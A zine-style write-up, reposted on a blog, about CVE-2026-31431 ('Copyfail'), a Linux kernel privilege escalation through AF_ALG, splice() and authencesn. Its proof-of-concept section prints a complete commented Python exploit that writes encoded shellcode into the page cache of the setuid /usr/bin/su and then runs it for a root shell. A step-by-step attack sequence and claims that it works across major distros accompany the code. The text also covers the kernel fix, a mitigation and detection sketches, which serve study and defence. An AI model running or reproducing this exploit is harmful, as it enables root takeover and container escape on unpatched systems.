Noë Flatreaud

732-Bytes to Pwn Linux Kernel

This is a zine repost.
https://ghspace.fr/zine/old/732_bytes_to_pwn_linux_kernel.txt

|=-----------------------------------------------------------------------=|
|=----------------=[ 732-bytes to pwn linux kernel ]=--------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ Beemo ]=--------------------------------=|
|=-----------------------------------------------------------------------=|

--[ Table of Contents

    0x01 - Intro
    0x02 - Dramatis Personae - subsystems
    0x03 - The bug nobody saw for 9 years
    0x04 - authencesn, ya cheating little bastard
    0x05 - From 1000 to 0
    0x06 - Proof of concept
    0x07 - Howtf nobody noticed
    0x08 - The fix (4 lines)
    0x09 - Thoughts on copyfail
    0x0a - References

--[ 0x01 - Intro

"Every so often, a bug comes along that makes you question whether
anyone ever reads the code they're committing to."

Every kernel LPE starts the same way. Here's another race
condition. Here's the window. Here's the heap spray. Here's the
KASLR leak. Here's the stack pivot and yada yada yada.

Good luck making it work twice.

Copyfail (CVE-2026-31431) - recently found by Taeyang Lee with a 
little help from AI - doesn't do any of that.

No race. No heap spray. No KASLR bypass. No ROP chain. No compiled 
binary. Just a logic flaw sitting in plain sight since 2017, 
weaponizable in 732 bytes of Python, yielding a juicy root shell 
on every major distro shipped in the last nine years.

You don't even need to be fast. Just a loop, four bytes 
at a time, from a Python script. 

So, how does it work?

--[ 0x02 - Dramatis Personae - subsystems


Three kernel subsystems walk into a bar. They've never met.
Each one is fine alone. Together they give any local user a write4
primitive into the page cache of any readable file O_o

[*] AF_ALG

    AF_ALG (address family 38) is a socket type that exposes the
    kernel's crypto subsystem to userspace, no capabilities needed.
    Any user can open one, bind to any registered alg template,
    and run encrypt/decrypt operations. It exists so userspace
    can offload crypto to hw accelerators without needing a
    kernel module per application.

    In practice, almost nobody uses it. OpenSSL's afalg engine is
    off by default, but most distros ship AF_ALG support anyway.

    >>> a = socket.socket(38, 5, 0)     # AF_ALG, SOCK_SEQPACKET
    >>> a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

[*] splice()

    splice() moves data between fds and pipes without copying. When
    you splice FROM a file, the pipe doesn't get a copy of the data.
    It gets a reference to the page cache page. The actual physical
    page.

    >>> splice(file_fd -> pipe)     # pipe now holds page cache ref
    >>> splice(pipe -> alg_fd)      # alg socket now holds page cache ref

    When you then splice from the pipe into another fd
    (like our AF_ALG socket), those page cache references travel into
    the crypto subsystem's scatterlist.

    That scatterlist now contains direct pointers to the physical
    pages that back every read(), mmap(), and execve() of that file 
    on the entire system.

[*] authencesn

    authencesn is an AEAD wrapper. It exists for IPsec Extended 
    Sequence Numbers (RFC 4303), where 64-bit sequence numbers are 
    split across the AAD. 

    The wrapper has to rearrange bytes for HMAC computation.
    To do it, it uses the caller's output buffer as a scratch space, 
    writing 4 bytes past the end of the legitimate output area. 
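
    To make the hi/lo split concrete, here is a small sketch that
    cuts a 64-bit sequence number into two big-endian 32-bit words.
    The function names split_esn() and join_esn() are illustrative
    assumptions, not kernel or RFC identifiers.

```python
import struct


def split_esn(seq):
    """Split a 64-bit sequence number into (hi, lo) 4-byte big-endian words."""
    if not 0 <= seq < 1 << 64:
        raise ValueError("sequence number must fit in 64 bits")
    packed = struct.pack(">Q", seq)
    return packed[:4], packed[4:]


def join_esn(hi, lo):
    """Inverse of split_esn(): rebuild the 64-bit sequence number."""
    return struct.unpack(">Q", hi + lo)[0]
```

    For example, split_esn(0x0000000100000002) gives the pair
    (b"\x00\x00\x00\x01", b"\x00\x00\x00\x02").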


--[ 0x03 - The bug nobody saw for 9 years


In the old code (pre-2017), src and dst were separate. Page
cache pages were in src (read side). The output went to dst
(user buffer). Safe.

In 2017, commit 72548b093ee3 added an optimization to algif_aead.c: 
perform AEAD operations in-place. 

For decryption, the code now:

  - Copies AAD and ciphertext from the TX scatterlist (which may 
    contain page cache pages from splice) into the RX buffer 
    (the user's recvmsg buffer).

  - Does NOT copy the authentication tag. Instead, it chains the
    tag pages from the TX scatterlist onto the end of the RX
    scatterlist using sg_chain().

  - Sets req->src = req->dst
    (both point to the same combined scatterlist).


    req->src ----+
                 |
                 v
    req->dst --> [ AAD  ||  CT  ] --> [ Tag (page cache pages) ]
                 ^^^^^^^^^^^^^^^^     ^^^^^^^^^^^^^^^^^^^^^^^^^^
                 \ RX buffer          \ chained from TX SGL -+
                     (user mem)           (file's page cache)


The output scatterlist now has a writable zone (the RX buffer) 
followed immediately by page cache pages of whatever file was 
spliced in. Nothing enforces the boundary between them. Nothing 
documents this as a constraint. It's a silent invariant that every 
AEAD algorithm is expected to honor.

Every AEAD algorithm does, indeed... except one.


--[ 0x04 - authencesn, ya cheating little bastard


authencesn handles IPsec Extended Sequence Numbers. 64-bit
seqno split into hi (bytes 0-3) and lo (bytes 4-7) of the AAD.

During decrypt, it needs to rearrange these bytes for the HMAC.
Instead of allocating a scratch buffer it uses the caller's 
destination scatterlist as a notepad:

crypto_authenc_esn_decrypt() ->

    >>> // read first 8 bytes of AAD (seqno_hi || seqno_lo)
    >>> scatterwalk_map_and_copy(tmp, dst, 0, 8, 0);
    >>>
    >>> // write seqno_hi at dst[4..7] (within AAD, fine)
    >>> scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
    >>> 
    >>> // write seqno_lo at dst[assoclen + cryptlen] (PAST THE END)
    >>> scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
                                               ^^^^^^^^^^^^^^^^^^^^
                                                \ bug here!

That third write goes 4 bytes past the legitimate output boundary. 

scatterwalk_map_and_copy() faithfully walks the scatterlist, hits
the sg_chain boundary, maps the page cache page via
kmap_local_page(), and writes 4 bytes of payload data directly
into the kernel's cached copy of the target file.

The HMAC check runs, fails (the ciphertext is garbage - don't 
care), recvmsg() returns -EBADMSG. Nobody checks the page cache. 
The corrupted page is never marked dirty. The file on disk is 
unchanged. But every subsequent read of that file, from any process, 
from any container, sees the corrupted version.
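
The three copies can be modelled in userspace with plain bytearrays.
This is a toy simulation, not kernel code: map_and_copy() only
imitates the argument order of scatterwalk_map_and_copy(), the
"scatterlist" is a Python list of named segments, and the hi/lo
naming follows this article's description. It shows why a write at
assoclen + cryptlen lands in whatever segment is chained after the
RX buffer.

```python
def map_and_copy(sgl, buf, start, nbytes, out):
    """Toy stand-in for scatterwalk_map_and_copy().

    sgl is a list of (name, bytearray) segments treated as one flat range.
    out=False copies sgl -> buf, out=True copies buf -> sgl.
    Returns the names of the segments that were touched.
    """
    touched = []
    seg_start = 0
    done = 0
    for name, seg in sgl:
        seg_end = seg_start + len(seg)
        while done < nbytes and seg_start <= start + done < seg_end:
            idx = start + done - seg_start
            if out:
                seg[idx] = buf[done]
            else:
                buf[done] = seg[idx]
            done += 1
            if name not in touched:
                touched.append(name)
        seg_start = seg_end
    if done != nbytes:
        raise IndexError("copy runs past the end of the toy scatterlist")
    return touched


def toy_esn_decrypt_scratch(aad, cryptlen, tag_page):
    """Replay the three scratch copies against a two-segment toy list."""
    assoclen = len(aad)
    rx = bytearray(aad) + bytearray(cryptlen)  # "user memory": AAD || CT
    sgl = [("rx", rx), ("tag", tag_page)]      # tag segment chained after RX
    tmp = bytearray(8)
    map_and_copy(sgl, tmp, 0, 8, False)        # read first 8 bytes of AAD
    map_and_copy(sgl, tmp[0:4], 4, 4, True)    # lands inside the AAD
    # offset assoclen + cryptlen is the first byte AFTER the rx segment
    return map_and_copy(sgl, tmp[4:8], assoclen + cryptlen, 4, True)
```

With aad = b"AAAAWXYZ", cryptlen = 16 and a zeroed 16-byte tag_page,
the last call reports that only the "tag" segment was touched, and
tag_page now starts with b"WXYZ". Nothing in the walk itself knows
that the second segment was supposed to be read-only.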


--[ 0x05 - From 1000 to 0


The full sequence:

    1. Open socket(AF_ALG), bind to authencesn(hmac(sha256),cbc(aes)).
       Set a key. Accept a request socket.

    2. Open /usr/bin/su (or any setuid binary) for reading.

    3. For each 4-byte chunk of your shellcode:

       a. sendmsg(AAD[8 bytes], cmsg=[DECRYPT, IV, ASSOCLEN=8], MSG_MORE)
          Where bytes[4:8] = the 4 bytes to write.
          Set assoclen, IV, etc. via cmsg headers.

       b. splice() from /usr/bin/su into a pipe, then from the pipe
          into the AF_ALG socket.

          splice(target_fd -> pipe, offset=target_page_offset, len=32)
          splice(pipe -> op_fd, len=32)

          Choose offset so that the tag region aligns with your target
          offset in su's .text section.

       c. recv(op_fd)
          ^^^^^^^^^^
          \ -EBADMSG, but scratch write already fired

          Triggers the decrypt. authencesn writes your 4
          bytes into the page cache. HMAC fails. recv() returns
          an error. The page cache is corrupted. Move to next chunk.

    4. execve("/usr/bin/su"). The kernel loads su from the page 
       cache. Your shellcode is in .text. su is setuid root. 

       Congrats, you now root :D

Every process reading that file through the page cache sees the
corruption. execve() loads from the page cache. getpwnam() reads
from the page cache. The on-disk file, however, is untouched: fsck
is clean, tripwire is clean, AIDE is clean, because nothing was
written to disk.
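
One way to look for this kind of cache-versus-disk mismatch, sketched
under assumptions: read the file once through the page cache and
once with O_DIRECT, then diff the two in 4-byte words. The helper
names are made up for illustration. The sketch assumes that O_DIRECT
reads on your filesystem bypass clean cached pages, and that a
4096-byte block satisfies its alignment rules. Neither holds
everywhere (tmpfs, for instance, may reject O_DIRECT outright).

```python
import mmap
import os

BLOCK = 4096  # assumption: large enough for the fs O_DIRECT alignment


def read_buffered(path):
    """Ordinary read: served from the page cache when the file is cached."""
    with open(path, "rb") as fh:
        return fh.read()


def read_direct(path, block=BLOCK):
    """Read via O_DIRECT into a page-aligned anonymous mmap buffer."""
    fd = os.open(path, os.O_RDONLY | os.O_DIRECT)
    buf = mmap.mmap(-1, block)
    chunks = []
    offset = 0
    try:
        while True:
            n = os.preadv(fd, [buf], offset)
            chunks.append(buf[:n])
            if n < block:  # short read: end of file reached
                break
            offset += n
    finally:
        buf.close()
        os.close(fd)
    return b"".join(chunks)


def mismatched_words(cached, on_disk, width=4):
    """Offsets of every `width`-byte word that differs between the two views."""
    length = max(len(cached), len(on_disk))
    return [off for off in range(0, length, width)
            if cached[off:off + width] != on_disk[off:off + width]]
```

Usage would be along the lines of
mismatched_words(read_buffered(p), read_direct(p)) for some path p.
An empty list means both views agree. Any offsets returned point at
words where the cached copy no longer matches the disk.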

No races to win. No timing windows. No kernel version checks. No 
arch-specific gadgets. The same script works on:

    Ubuntu 24.04    (6.17.0-1007-aws)
    Amazon Linux    (6.18.8-9.213.amzn2023)
    RHEL 10.1       (6.12.0-124.45.1.el10_1)
    SUSE 16         (6.12.0-160000.9-default)

...and every other distro that ships the default kernel config with
AF_ALG enabled.


--[ 0x06 - Proof of concept


The full exploit is 732 bytes minified, but I'll add some
comments for context. You can find the original here:
https://github.com/theori-io/copy-fail-CVE-2026-31431


--8<-- cut here ---------------------------------------------------[[ BEGIN

#!/usr/bin/env python3

import os as g, zlib, socket as s

def d(x): return bytes.fromhex(x) # htob

def c(f, t, c):

    # f = fd of target file (/usr/bin/su)
    # t = offset within file to write at
    # c = 4 bytes to write (shellcode chunk)
    
    # Open AF_ALG socket, bind authencesn
    # socket(family=AF_ALG, type=SOCK_SEQPACKET, proto=0)
    # https://docs.python.org/3/library/socket.html#socket.socket 

    a = s.socket(38, 5, 0) 
    a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    h = 279  # SOL_ALG
    
    # ALG_SET_KEY: 8-byte authenc header (rtattr + enckeylen=16), then
    # 32 zero bytes of key material (16 HMAC key + 16 AES-128 key)
    v = a.setsockopt
    v(h, 1, d('0800010000000010' + '0'*64))
    
    # ALG_SET_AEAD_AUTHSIZE (optname 5): tag length = 4 bytes
    v(h, 5, None, 4)

    # Accept request fd
    u, _ = a.accept()
    
    o = t + 4  # offset adjustment

    # sendmsg() 
    #   (AAD = b"A"*4 + seqno_lo)
    #   (SOL_ALG, ALG_SET_OP)        = decrypt (0x00 * 4)
    #   (SOL_ALG, ALG_SET_IV)        = 16 null bytes
    #   (SOL_ALG, ALG_SET_AEAD_ASSOCLEN) = 8

    i = d('00')
    u.sendmsg(
        [b"A"*4 + c],                  # AAD with payload in seqno_lo
        [
            (h, 3, i*4),               # ALG_SET_OP 	= decrypt
            (h, 2, b'\x10' + i*19),    # ALG_SET_IV 	= 16 zero bytes
            (h, 4, b'\x08' + i*3),     # AEAD_ASSOCLEN 	= 8
        ],
        32768                          # MSG_MORE
    )

    # splice target file pages into AF_ALG socket
    r, w = g.pipe()
    n = g.splice
    n(f, w, o, offset_src=0)   # file -> pipe (page cache refs!)
    n(r, u.fileno(), o)        # pipe -> AF_ALG socket

    # trigger decrypt (authencesn writes seqno_lo into page cache)
    
    try:
        u.recv(8 + t)
    except:
        pass  # EBADMSG expected
        
f = g.open("/usr/bin/su", 0)  # O_RDONLY
i = 0

# Decompress shellcode (execve("/bin/sh") or similar)
e = zlib.decompress(d(
    "78daab77f57163626464800126063b0610af82c101cc7760c004"
    "0e0c160c301d209a154d16999e07e5c1680601086578c0f0ff86"
    "4c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa4999"
    "79fac5190c0c0c0032c310d3"
))

# Write shellcode 4 bytes at a time into su's page cache
while i < len(e):
    c(f, i, e[i:i+4])
    i += 4

# Execute the corrupted setuid binary
g.system("su")

# Dang, you root :D

--8<-- cut here -----------------------------------------------------[[ EOS

Usage:

$ python3 copy_fail_exp.py
$ id
  uid=0(root) gid=1002(user) groups=1002(user)

That's it. 732 bytes. Every distro. Every time.


--[ 0x07 - Howtf nobody noticed


Well... the bug exists because of three independently reasonable
changes by three different developers across six years:


    2011: authencesn added to support IPsec ESN (a5079d084f8b).
          The scratch write at dst[assoclen+cryptlen] is harmless - 
          the only caller is the in-kernel xfrm layer, and src/dst 
          are separate scatterlists. Nobody outside the kernel ever 
          touches this code.

    2015: AF_ALG gains AEAD support (algif_aead.c). splice() can 
          now deliver page cache pages into the crypto scatterlist. 
          authencesn is converted to the new AEAD API (104880a6b470). 
          But AF_ALG uses out-of-place: req->src != req->dst. Page 
          cache pages are in src (read-only). The scratch write goes 
          to dst. Still not exploitable as is.

    2017: In-place optimization (72548b093ee3). req->src = req->dst. 
          Page cache tag pages are chained into the writable 
          destination via sg_chain(). authencesn's scratch write now 
          crosses from the RX buffer into page cache pages.


The corruption is silent - no crash, no kernel log, no visible 
side effect except the page cache being wrong. It doesn't trigger any 
existing kernel self check. No KASAN or UBSAN. No lockdep. No page flags.

The kernel doesn't know the page is corrupted because the write 
went through a legitimate code path (scatterwalk_map_and_copy) on a page
that was legitimately mapped.


--[ 0x08 - The fix (4 lines)


Commit a664bf3d603d reverts algif_aead.c to out-of-place operation:

	diff --git a/before b/after
	index aff63c7..9ca2c95 100644
	--- a/before
	+++ b/after
	@@ -1,5 +1,5 @@
	 aead_request_set_crypt(
	 &areq->cra_u.aead_req,
	-rsgl_src,                          // RX SGL (same as dst)
	-areq->first_rsgl.sgl.sgt.sgl,      // RX SGL
	+tsgl_src,                          // TX SGL (src)
	+areq->first_rsgl.sgl.sgt.sgl,      // RX SGL (dst, separate)
	 used, ctx->iv);

The commit message: "There is no benefit in operating in-place in 
algif_aead since the source and destination come from different 
mappings."

You can temporarily mitigate if you're not able to patch yet:

    $ echo "install algif_aead /bin/false" \
        > /etc/modprobe.d/disable-algif-aead.conf
    $ rmmod algif_aead 2>/dev/null

This kills the AF_ALG AEAD socket type. You'll break apps, yes,
but only those that explicitly bind aead sockets via AF_ALG, which
in practice is almost none.
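
To double-check that the mitigation took, a rough sketch: parse the
text of /proc/modules and of a modprobe.d snippet. Both function
names are hypothetical. The sketch assumes algif_aead is built as a
loadable module. If your kernel has it built in, an install rule
will not help and this check tells you nothing.

```python
def module_loaded(proc_modules_text, name="algif_aead"):
    """True if `name` is listed as a loaded module in /proc/modules text."""
    for line in proc_modules_text.splitlines():
        fields = line.split()
        if fields and fields[0] == name:
            return True
    return False


def install_blocked(conf_text, name="algif_aead"):
    """True if a modprobe.d snippet maps `name` to /bin/false or /bin/true."""
    wanted = name.replace("-", "_")  # modprobe treats '-' and '_' alike
    for line in conf_text.splitlines():
        fields = line.split("#", 1)[0].split()  # drop trailing comments
        if (len(fields) >= 3 and fields[0] == "install"
                and fields[1].replace("-", "_") == wanted
                and fields[2] in ("/bin/false", "/bin/true")):
            return True
    return False
```

Feed module_loaded() the contents of /proc/modules and
install_blocked() the contents of each file under /etc/modprobe.d/.
You want the first to be False and the second to be True.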


--[ 0x09 - Thoughts on copyfail


Copyfail might be the cleanest kernel LPE in recent history.

It doesn't need a race. It doesn't need a spray. Definitely no leaks.
It doesn't even need a compiled binary. A 732-byte Python script, 
using only stdlib modules, gets you root on every major Linux 
distribution shipped since 2017. The same script crosses container 
boundaries because the page cache is host-wide.

--[ 0x0a - References

[1] CVE-2026-31431 disclosure
    https://copy.fail/
[2] Xint Code write-up
    https://xint.io/blog/copy-fail-linux-distributions
[3] PoC source
    https://github.com/theori-io/copy-fail-CVE-2026-31431
[4] Kernel fix (a664bf3d603d)
    https://github.com/torvalds/linux/commit/a664bf3d603d
[5] In-place optimization commit (72548b093ee3)
    https://github.com/torvalds/linux/commit/72548b093ee3
[6] authencesn original commit (a5079d084f8b)
    https://github.com/torvalds/linux/commit/a5079d084f8b

|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|

   |          _  ===      B____     _e_                            .
  - -        ( `\( )     | __  |e__| -_|___m_ __o              |
   |          `> /~\ _*  | __ -| -_|___|     | . |            - -
              (_/ /\/    |_____|___|   |_|_|_|___|             |              
        *       \ \       nflatrea@mailo.com                            
                `./       https://nflatrea.bearblog.dev             *
   -                      Made with <3                        ... .

|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|

--[ EOF
